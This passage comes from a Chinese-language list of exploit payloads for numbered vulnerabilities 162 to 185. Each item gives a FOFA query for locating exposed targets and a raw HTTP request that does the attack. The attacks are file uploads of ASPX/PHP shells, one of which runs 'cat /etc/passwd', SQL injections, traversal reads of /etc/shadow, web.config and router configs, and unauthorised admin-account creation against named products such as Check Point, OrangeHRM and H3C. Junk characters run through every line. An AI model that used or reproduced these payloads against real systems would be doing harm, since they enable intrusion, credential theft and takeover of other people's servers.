2 I; c, k6 F' z3 k# c$ f2 C2 Z9 Q2 ^<soap:Body>
$ R% y+ a7 M" v& c0 _- g8 X- V<UploadResume xmlns="http://tempuri.org/">- X( M7 q3 d, U n
<ip>1</ip>
" E; _' M6 J' d2 y; F* y5 t<fileName>../../../../dizxdell.aspx</fileName>" `* p; V, b: e4 E
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>9 V3 \7 @. I! j1 A$ i
<tag>3</tag>) m, k) t" F2 m- i4 L8 K6 ?2 p
</UploadResume>
1 j+ h7 s4 e: x8 H) P, V</soap:Body>
2 p8 F" ~; A# C: p" W& M</soap:Envelope>4 K( a2 l8 c$ z
1 N. o/ p# P' ~" k" g( Y( k! m% h1 ~/ F1 B' ?1 ~, M
http://x.x.x.x/dizxdell.aspx' c! a8 V3 @" v9 c, M
" G6 A5 w" l% l3 o1 |1 F162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
# [: N' O: Y# n% X& ~FOFA: app="和丰山海-数字标牌"7 k# Q1 r z& L- j# N
POST /QH.aspx HTTP/1.11 b3 V4 O: V% I$ `3 H' Z
Host: x.x.x.x( z. g0 b6 Y# L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
# w% W2 S; ~* P4 y1 y0 c- X* qConnection: close
' j# Q4 O# r$ b( t& _+ I, YContent-Length: 583
% E4 J% M) X4 u' f2 A6 _1 d( XContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey0 \4 e. e5 `/ ?+ y( m; J+ w
Accept-Encoding: gzip5 P+ U" I; ?" T
' O! f9 K' s. d1 U------WebKitFormBoundaryeegvclmyurlotuey- Z3 ^- W$ Z. f- O% |6 V
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
; P9 w [3 h' y* L: \) ?6 \Content-Type: application/octet-stream
1 d6 m2 Q- k' F3 Q' [1 C5 X$ p, Z$ T% z. |4 m4 P& j5 R
<% response.write("ujidwqfuuqjalgkvrpqy") %>, y9 z3 B0 d( J- ^0 B
------WebKitFormBoundaryeegvclmyurlotuey( y8 w V' w% I5 p0 D9 }
Content-Disposition: form-data; name="action"
+ F) g' d) n+ m: b9 v9 Q# i# n2 l, V: k- a5 J; F
upload3 G9 e# A+ i* O) ~2 r9 g+ W! f& |
------WebKitFormBoundaryeegvclmyurlotuey4 O. I: I1 j$ y) G" a7 Q9 b
Content-Disposition: form-data; name="responderId"
6 i8 L+ i- O8 P
4 y+ E: n* u4 X' {ResourceNewResponder/ `3 H& i3 @3 s' G8 m" w- |
------WebKitFormBoundaryeegvclmyurlotuey
1 o3 ~0 U, H! T3 w8 ?3 u- yContent-Disposition: form-data; name="remotePath"
L a c8 x$ ]4 m" Q. q/ j$ g3 b, @
7 @* ~) [/ i$ [. y% C" u/opt/resources# ?3 n6 u+ ^3 _8 e! Y, D
------WebKitFormBoundaryeegvclmyurlotuey--6 x( |/ C! Z+ T& O" X
7 I! ~. _' S- d+ S
' c& _0 w# F8 c8 K+ V7 g
http://x.x.x.x/opt/resources/kjuhitjgk.aspx8 |4 @* {( r, B0 e0 [
% z* f( M' I+ g$ Y# {9 M
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
% U5 j1 Z) E8 n$ m) iFOFA: icon_hash="-795291075"
3 Q. T/ D6 O5 ]6 g* s# l q1 X+ KPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
0 z; G" ~) |! l2 E0 CHost: x.x.x.x
" i. B! L- Q6 Q' MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36) F! B2 p- G/ q) k
Connection: close
0 J* }9 ~/ D" d$ r5 s; L. TContent-Length: 293/ q) q2 }# K! m2 V
Accept: */*
5 L$ f3 _/ O: F0 {1 I7 D) LAccept-Encoding: gzip, deflate$ v. B; W: Q) |- X. Z
Accept-Language: zh-CN,zh;q=0.9 D4 Y% X; h/ a% G9 n9 m. J0 \
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod- |! S4 E; n4 J) e3 e. p# ^9 F
. z2 W: G& \) I4 Z
------iiqvnofupvhdyrcoqyuujyetjvqgocod+ S- t9 m- ]; Y8 |/ ]( o
Content-Disposition: form-data; name="name"8 d; O# W: I0 ]2 i
1 O8 _* v! t1 F" G \1.php b: a7 E2 m# y1 f; _
------iiqvnofupvhdyrcoqyuujyetjvqgocod0 c6 P9 X* b2 i! J( D9 M
Content-Disposition: form-data; name="upfile"; filename="1.php"' j/ E- ]. _7 W$ c7 Y6 [
Content-Type: image/jpeg
$ b$ [# p6 g$ l/ X: H0 K: c" y2 K6 o
rvjhvbhwwuooyiioxega
# J% H2 L9 ]) `& D% o------iiqvnofupvhdyrcoqyuujyetjvqgocod--; q6 U) M0 P4 G: i9 R' ~
; @& R W5 b8 B' j2 D
" Y: D; D) p0 `+ e+ ?164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传9 f5 h2 j( q! p/ X
FOFA: title="智慧综合管理平台登入". x# s- r/ t, P. i1 A1 i8 M2 Q
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
. s" E2 Y m! ^; M/ [# WHost: x.x.x.x- l% y& {3 G$ Y/ [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0% r# O4 K0 G/ h6 \; h
Content-Length: 288
- w( m# I2 r0 C/ u# ?' AAccept: application/json, text/javascript, */*; q=0.01
2 I+ l( ~8 |* s( Q8 `0 s& v( iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,' x7 g0 U# {! f) X3 k
Connection: close
7 }- p. Z! b6 }. [1 P% a/ ?" bContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
* J! |6 h" X% G# mX-Requested-With: XMLHttpRequest
0 q# ^+ u- N3 q. l$ ^/ C' {9 mAccept-Encoding: gzip
8 n$ H( B9 z3 d+ F+ H
/ y5 h3 j! D. {6 F9 V' e" U------dqdaieopnozbkapjacdbdthlvtlyl
0 D6 f" O3 y. B) Q( X" [0 gContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"/ R; I: v+ p) `; f x6 J
Content-Type: image/jpeg
6 y( y0 B8 c) L% w! f" W2 }1 T, G* v. o
$ ^% s+ Q: T& _/ n$ N3 R0 s5 ~8 J<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>. E! g) o, J: k( \
------dqdaieopnozbkapjacdbdthlvtlyl-- q, E" l. G9 D6 R: i# ~' {
1 L/ S' W% x& H I
`, {% E M5 A2 dhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx6 Z4 d# X: L6 o& ^2 R) h; ^" d! `) `+ G
2 `9 _# L: A4 h' N- T, H3 t
165. OrangeHRM 3.3.3 SQL 注入" ^7 R3 _* U. j! z; V8 n
CVE-2024-36428) s/ M; [* s; j5 c
FOFA: app="OrangeHRM-产品"
7 j$ i2 L' J5 z h0 dURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
`) d0 k( v8 x' R5 T7 H1 Y0 t7 c% c; r
4 h9 \ y, |9 v) t
166. 中成科信票务管理平台SeatMapHandler SQL注入
4 } t( v1 p% M$ |* |FOFA:body="技术支持:北京中成科信科技发展有限公司"" T9 k5 {/ b0 L1 N) }
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1% |# w. [( }- }' E* K
Host:2 S% t/ ?, i; u/ k* z
Pragma: no-cache
! ~+ h/ c2 `& {Cache-Control: no-cache/ a" U* j6 g1 v) \
Upgrade-Insecure-Requests: 1
4 K5 q9 _5 C; R( dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36/ B) w# e1 h6 M5 E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) e) E+ l5 O7 a
Accept-Encoding: gzip, deflate
" m: c* S/ s$ L7 |Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
9 ?6 V" F* {5 r5 cCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE; }- U: l/ ?3 X$ b# v( X
Connection: close
$ c" l$ l* W& L8 `7 W3 L4 SContent-Type: application/x-www-form-urlencoded
; `1 S% ^/ _$ M: T* H; qContent-Length: 89
! }6 U1 a, ?; l3 z4 X% F9 j$ @' E; V! |* J( `* u
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE! g2 G+ ]7 S$ O) P
% W3 z* G8 N: r7 C6 j( B- v! \% X
" w1 c' a2 N2 b8 A) H' [167. 精益价值管理系统 DownLoad.aspx任意文件读取. |) |! \5 ?! z, G( O* v4 {
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
* F6 O6 `" u1 i8 vGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
7 b+ H. Z! }7 `, F4 ?Host:% X, q5 X4 R A& s9 g" G+ I7 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% |7 M6 u( E: v i9 t
Content-Type: application/x-www-form-urlencoded
3 k8 D# j9 X8 Q x8 z9 m nAccept-Encoding: gzip, deflate: w: ~# ?7 I" y/ }7 `
Accept: */*. T5 u3 b1 H( ~* \- }: f
Connection: keep-alive4 `2 C& a9 y6 l% ]
3 n/ ]+ t3 H5 `8 o; i
, L G& E% v6 j8 P
168. 宏景EHR OutputCode 任意文件读取
/ r5 k; b, M3 F' D. W5 i3 ]FOFA:app="HJSOFT-HCM"
9 {8 V8 d/ y g+ `5 k2 ]* l' x. dGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1- @/ G1 K" G3 u+ K3 |3 d# L* R; R
Host: your-ip5 P1 x7 J9 s7 o' j' r- \$ k$ L3 x! V) ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
# t8 R+ U% u/ p. b) ~4 PContent-Type: application/x-www-form-urlencoded9 S/ l2 p1 j, P4 }
Connection: close4 o2 W( u4 F3 e& g& \
( ]% k9 n! U( o: z1 |: Y7 @$ k: }3 H, U
4 ?7 L& W- ~. J5 N2 {169. 宏景EHR downlawbase SQL注入
& q8 o- U% i W o* _# X: {FOFA:app="HJSOFT-HCM"
6 a5 T& O# U3 Q" C+ e0 X4 r1 ?GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.13 ]( G! |8 {+ J F+ Q" M& `
Host: your-ip- _& z* N9 e3 o, l) ^& N% d. C9 X5 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ {6 S2 f4 B! H8 r( O: Z& }5 |
Accept: */*
" [2 W! K7 _7 k1 Z3 |1 JAccept-Encoding: gzip, deflate' ]0 j' [1 w+ I. ^% S
Connection: close& x2 q8 \3 m" G$ r/ k
+ i T6 E8 B& U% Y' l0 T* a! ]
3 k3 C, s0 X" I, V6 d+ s; j* X8 u6 {( _# L i( J, P7 A0 }8 w, C, T; a# [
170. 宏景EHR DisplayExcelCustomReport 任意文件读取+ b# u1 `- L/ s/ y" _" O
FOFA:body="/general/sys/hjaxmanage.js"4 k& w( J' z8 {! k% U( E
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
' D4 w! u2 {5 _7 v6 yHost: balalanengliang
5 e }% K0 K; i+ z: V3 pUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 ?# d) m& H1 [! D K1 M% sContent-Type: application/x-www-form-urlencoded
; Y* M* O% Q" \9 a" }$ O2 y
) C3 z/ H2 L& \# r* |, b5 W/ r: b2 `filename=../webapps/ROOT/WEB-INF/web.xml2 Q5 d0 L$ H) ?* I: S9 t# J& c
- A: m& E5 W3 n8 ^8 v" U W! B9 N7 T% T% X" E8 R
171. 通天星CMSV6车载定位监控平台 SQL注入
6 G/ C. ~/ T6 |7 K5 I7 iFOFA:body="/808gps/"
: g [ `$ Y! d. uGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1( ^1 ?/ z/ X0 E; q# ?! U- C2 ]
Host: your-ip
+ Q& q9 e g, eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
7 |! z3 Y$ d, ~Accept: */*( u1 w( V! E4 S/ R1 L- e* ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( Y* u! V$ s8 j% H
Accept-Encoding: gzip, deflate
$ P [8 v, v/ y$ n% {7 AConnection: close a6 x1 |5 n6 G C
# M( s- E. Y# w& i a E( u
: s0 }7 h4 ~ n1 I2 h: Y1 \5 x1 @( L5 |3 `
172. DT-高清车牌识别摄像机任意文件读取7 F2 K1 N- y K$ m
FOFA:app="DT-高清车牌识别摄像机"
+ ?( R( ]5 ]% `5 n MGET /../../../../etc/passwd HTTP/1.1
" N) q4 n" G- S& u+ a" FHost: your-ip
6 l) o/ l3 m. a: L0 i! JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- @$ p6 C4 [% a* L5 ~7 R
Accept-Encoding: gzip, deflate
' e2 ]' r) C- t# }0 MAccept: */*
) D$ E3 u; @1 f8 G# @Connection: keep-alive( @1 ?3 D0 h/ D2 v! r
- B, ]6 y- y- r, N; H" C
6 G0 Y* u1 L3 k
4 F! v! w ?7 b! H173. Check Point 安全网关任意文件读取% ~ w) p' q* w/ x# E2 J4 O, {# M
CVE-2024-24919
6 L4 ?3 P) _( [( f: XFOFA:app="Check_Point-SSL-Network-Extender"
* k5 N7 w, `' ~POST /clients/MyCRL HTTP/1.14 M' d; s7 D4 v5 n
Host: your-ip5 r4 k0 u7 M4 o+ e2 ~6 `
Content-Type: application/x-www-form-urlencoded
4 V. Q0 o: E6 [* Y7 {1 M( C2 Y. Z; u6 S Q" ?4 z# a! ?
aCSHELL/../../../../../../../etc/shadow/ N( v0 m2 q7 Y6 W" h. m
i- T/ {0 U9 p8 S8 f' k, T" u7 h% i" C, v4 _0 K A, w
# S4 } j4 u7 L, I174. 金和OA C6 FileDownLoad.aspx 任意文件读取7 S9 z n# S8 A
FOFA:app="金和网络-金和OA"7 o/ k9 Q2 s/ }* C
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
- h" N. A/ Z9 ~8 [3 U# t' _Host: your-ip
0 ]" m! R/ K; X1 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.365 e9 i! v! P* j q9 O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 k) Y. U% @6 s" a! a) {Accept-Encoding: gzip, deflate, br5 b* w* o' d& q C
Accept-Language: zh-CN,zh;q=0.9+ ]! x$ Y& s4 n5 b" g6 T$ P
Connection: close( X/ e0 `$ X, }% `
" i$ i6 }/ l- w- m, q
L$ Z* [- L' e% Q0 I! ?- N1 B" L0 f% f( K
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入; E. {" d7 S, m
FOFA:app="金和网络-金和OA"6 `: U0 F( G& C/ F
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
2 s- W% |: e S! P* P) s( {, kHost:
3 o; W N% J e/ W- F; OUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36+ f, }2 F) j. `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 b# E; }7 [, U; [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" j" K. h; @- e% o O0 p
Accept-Encoding: gzip, deflate
# i6 e9 V; O9 X- b0 \5 Q" @! vConnection: close+ Y( @3 |6 M% H8 i( w6 M, X
Upgrade-Insecure-Requests: 1+ N6 S; B, j0 O8 K
1 p# F6 L$ q! W
/ J2 Z% `9 B3 F176. 电信网关配置管理系统 rewrite.php 文件上传' X1 D* j' {; ]0 _7 O
FOFA:body="img/login_bg3.png" && body="系统登录": \7 ~* d) ]0 u; ~
POST /manager/teletext/material/rewrite.php HTTP/1.1
5 u: J- u# i8 U" R4 K- h7 Y7 hHost: your-ip a9 `4 X8 o% g' \ [$ V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
. |7 \ S+ _+ P' R( HContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
7 L6 H! a7 l+ g0 o) hConnection: close& x9 y/ c; O' P% d
! T: D8 V# G$ F1 @1 n2 U4 y
------WebKitFormBoundaryOKldnDPT6 F* m5 F& d/ K9 H$ e" P- ^' U
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
3 A: L) A' z" j* CContent-Type: image/png' u* c. r& D5 y5 k t3 K2 p7 j [0 v
3 @9 Z' y/ H+ q& h/ y. H/ j3 d5 C- i
<?php system("cat /etc/passwd");unlink(__FILE__);?>+ K* h5 _5 o6 ^& [
------WebKitFormBoundaryOKldnDPT
) U# |4 }% Q5 d7 GContent-Disposition: form-data; name="uploadtime". C) X- O6 I! _
2 p& m2 ~& C+ r/ o
6 }4 F5 s5 N# _' T
------WebKitFormBoundaryOKldnDPT--
2 H) d, p& b0 x3 O% @( ]. D% r
. Q7 v' x1 F- r$ e! N
" E; X+ l0 o9 E- B
, X( Z7 P. |" R0 @, J9 e8 b# c177. H3C路由器敏感信息泄露0 I$ {, D, u) A" t2 `- [
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
0 e- I/ t- {" O1 v* L9 _, Y" R" f/userLogin.asp/../actionpolicy_status/../M60.cfg! |. P4 A) f0 M* [: |
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
! F% d4 ~ x0 ]+ M g6 i) b/userLogin.asp/../actionpolicy_status/../GR5200.cfg
( P) v- |- e$ y! c9 B7 j/userLogin.asp/../actionpolicy_status/../GR3200.cfg
9 U6 e( k+ n% w) I [9 A/userLogin.asp/../actionpolicy_status/../GR2200.cfg
! `* p- z j" T0 d/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg3 T1 Z7 n' d( {* a* f, ^+ j
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg I6 m4 X2 {( r% K
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
3 Z5 z8 w8 s) K+ l1 Z/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
7 Q; a2 @* n* I/userLogin.asp/../actionpolicy_status/../ER5200.cfg3 Y7 d! H, [2 ^3 w
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
& Z9 H/ _( ]! ~/ r. J8 Q/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
( z- E& j* d7 R- s/userLogin.asp/../actionpolicy_status/../ER3260.cfg
* {8 {; ~! t4 { \) l# `4 r/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
& ?8 V! U9 m$ }6 S$ @8 i) `* H0 |$ y/userLogin.asp/../actionpolicy_status/../ER3200.cfg, \) Q p/ B- G5 T& O5 Z" Y$ L
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
! L2 _0 @7 }) F/userLogin.asp/../actionpolicy_status/../ER3108G.cfg" e* U1 M y5 s5 h* g2 Y: I
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
# D+ Q% e9 p8 ]/userLogin.asp/../actionpolicy_status/../ER3100.cfg
! y7 Q9 `+ q; [- r" z/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg Y7 V2 `8 S, u8 i
" A& H- Z+ y# b
, _; g$ y% O0 b" i2 K$ w% b$ r178. H3C校园网自助服务系统-flexfileupload-任意文件上传
) K6 W! ~5 ~# {FOFA:header="/selfservice"4 f, i: q, \( o5 B; r4 n
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1, d, M Y7 h r
Host:
$ T. ^9 ~- M, `, M4 J1 J( {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36$ c! i9 D1 K3 T2 }$ O6 r, T5 {
Content-Length: 2521 ?# O/ V7 h4 w5 a8 L C9 }" e i- s
Accept-Encoding: gzip, deflate
! \1 g4 H& G7 A; v6 t1 [" CConnection: close
5 i* U! C4 I0 D: R$ q8 p0 EContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
/ r9 P2 a4 k6 r$ c9 F* z-----------------aqutkea7vvanpqy3rh2l
) d4 n0 \# k3 A. xContent-Disposition: form-data; name="12234.txt"; filename="12234"
, [2 s0 Q) d& E& t' ZContent-Type: application/octet-stream
; F% H: o5 z' s x4 _9 W4 f# v6 z) ~Content-Length: 255: r/ j5 v. K+ W- P/ U$ S2 m: K
2 o. T6 K8 W+ Z* N8 k122345 ` G$ D9 J' X
-----------------aqutkea7vvanpqy3rh2l--
S Z# a" H9 s$ g& x: Z9 P' W9 Q: }: l6 z z* H/ x8 H( k2 r
: Q9 l: a7 q& XGET /imc/primepush/%2e%2e/flex/12234.txt5 q2 Z9 d l8 A, `# ~$ Q
4 a( A: N' R8 y2 t2 K- a
: }0 @5 C7 S1 `! A; W179. 建文工程管理系统存在任意文件读取
( z8 d1 o% F4 @POST /Common/DownLoad2.aspx HTTP/1.1
7 f3 e" G8 D4 [9 N- wHost: {{Hostname}}% K0 l. Q) T5 c5 c2 w( e
Content-Type: application/x-www-form-urlencoded
- M* T( m' \' S5 J* `User-Agent: Mozilla/5.0; ~' b7 n" j" p8 x i7 Y
( y7 [) e5 K0 u5 s
path=../log4net.config&Name=9 ]4 s5 ^: _7 ~% p% W1 z- L
" `, L4 P0 e+ x( q( R/ {8 Z% U, \
180. 帮管客 CRM jiliyu SQL注入
4 b% F; [" f& b \0 s8 Z1 B& h3 J5 @FOFA:app="帮管客-CRM"
! G# H% N! e7 D4 e' ^- S% VGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.13 p, q: `: p4 g$ Q6 x- @
Host: your-ip/ V! A, g! N! m; O; m& x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36' \$ G$ w. O# s' h7 h0 v5 Z0 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 x$ [/ q) Z [' u
Accept-Encoding: gzip, deflate
6 h& R' M4 z: NAccept-Language: zh-CN,zh;q=0.9) {2 u* J2 s8 J( e
Connection: close1 P0 ^: e D0 m+ _
. w6 Z% B- {( c6 V/ W2 C
2 k6 i7 G& H8 k1 ~$ t: E( u181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入! E3 v. T; C' a8 w
FOFA:"PDCA/js/_publicCom.js"& Q3 V/ {) q1 o/ L3 o( b# F* s
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.19 Z1 a) M# H! ], F
Host: your-ip7 {/ ?1 p$ f( `, F3 r8 C0 N* N, u' m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
' }" S- g s$ g8 _+ OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: @1 G3 A# `/ r, \
Accept-Encoding: gzip, deflate, br
4 ]/ l3 l% r2 bAccept-Language: zh-CN,zh;q=0.9
! R$ E9 ]! l# }& ^Connection: close
2 ~( P$ @. X: m& V% ^Content-Type: application/x-www-form-urlencoded
( b' \- _* a Q5 C' q3 ^7 b5 a2 h# g: Q8 b1 Q
, y5 K& V4 M& T% e) m' o% ^& L
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=208 G" \/ D9 P& y, M" Y1 o
$ _' a8 P- C* X& U
. _2 U4 U5 f S5 g- l- U) u* V182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建8 X% R" D% p, f& N% Y
FOFA:"PDCA/js/_publicCom.js"- S" f4 J) w. s/ N/ a4 e
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.10 K# m0 V" W; s7 H C0 @9 E
Host: your-ip- T8 g4 D# }6 {: O, G( x6 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36- J0 g; U G" u/ z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 ?% X% m5 z( \2 V
Accept-Encoding: gzip, deflate, br
2 u) D9 s8 e% L! t [Accept-Language: zh-CN,zh;q=0.9+ \7 |$ J, P' `, L* f. Z0 z
Connection: close
5 L3 T- l1 x! d/ lContent-Type: application/x-www-form-urlencoded
% U+ J4 U! g3 O! U* ]% \" G- F; }3 H. M3 v: _! M
+ @) ^# Y @1 }! \* f9 ^username=test1234&pwd=test1234&savedays=1
( I; e v7 Y% k* M
) d ^8 ]0 y7 \* U2 E6 i
' U* P7 |7 k3 q6 R183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入( {; f$ G, D- t. C3 h7 O
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面") Z$ ] I- D9 J9 `9 v( e i( ? A
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.19 c/ p2 K' I: k& }
Host: your-ip
; B" u: v/ d1 d4 t6 k6 Q+ T I& y0 ~User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
0 m' ]. R: Z9 R! ]. N9 BAccept-Charset: utf-8" Q7 r, ]) S" P8 p! x4 G
Accept-Encoding: gzip, deflate
/ b" o0 t# D; D3 r/ b$ J$ n" L- [* nConnection: close- ]& i) U8 E3 X8 ~9 o9 i2 _ L8 B
( o7 {9 v, l1 F5 a" q6 w9 V! v4 b
- p G8 \+ x/ q3 F184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加1 M' L/ W# A& ?2 X. b: r
FOFA:server="SunFull-Webs"0 q9 ?) D) z7 c3 n C% W8 g5 E
POST /soap/AddUser HTTP/1.1
$ K0 j3 @2 D& I( U. Q9 \ aHost: your-ip
, `2 r% ^3 J4 Z' W$ \$ i2 J4 \7 I( DAccept-Encoding: gzip, deflate
- L$ |3 B1 b) ]3 J3 H5 W4 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
& U- A9 n; j, i2 l EAccept: application/xml, text/xml, */*; q=0.01
! v! l9 J) b. g) _6 [+ Q3 pContent-Type: text/xml; charset=utf-83 A3 u1 j3 y5 m/ z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) [0 P: W3 T* G# ~, \" RX-Requested-With: XMLHttpRequest& D, m ^. y {/ u4 @" I$ Q- s
1 ?) E' Z% x& _9 B$ H
6 h+ k; n h$ {/ ^: b, D3 uinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
, R2 h2 G: s7 M0 G# q* y' ^: l- V9 d# r6 R; i
/ X0 s: r; ?9 g/ F2 F: k1 w$ s9 N' D185. 瑞友天翼应用虚拟化系统SQL注入4 x/ V o. ^/ K! s
version < 7.0.5.1
